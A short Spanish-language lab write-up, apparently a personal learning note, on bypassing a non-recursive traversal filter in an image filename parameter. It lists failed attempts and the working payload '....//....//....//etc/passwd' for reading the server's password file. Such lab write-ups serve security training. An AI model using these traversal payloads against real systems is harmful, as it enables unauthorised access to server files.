🦉Laboratorio: recorrido de ruta de archivo , secuencias transversales eliminadas de forma no recursiv

• Entonces vamos a interceptar la url de la imagen, la petición

  

Aqui la tenemos, vamos a empezar a modificar la url, para ver si podemos obtener la secuencia transversal de forma no recursiva →

• El problema que estuve teniendo fue que intenté probar de todas las formas, sin embargo no hice la secuencia repetidas veces, por ello creía que no iba a poder encontrar la solución.

Las “soluciones” que probé yo:

1. /image?filename=12.jpg&….//etc/passwd

2. /image?filename=&….//etc/passwd

3. /image?filename=…./\etc/passwd

4. /image?filename=….//etc/passwd

5. /image?filename=….//….//etc/passwd → aqui me falto un recorrido más para la solución. ☹️

6. /image?filename=etc/passwd….//….//

Solución correcta:

1. /image?filename=….//….//….//etc/passwd → esta si era. 😄

Eso es todo gracias por leerme :)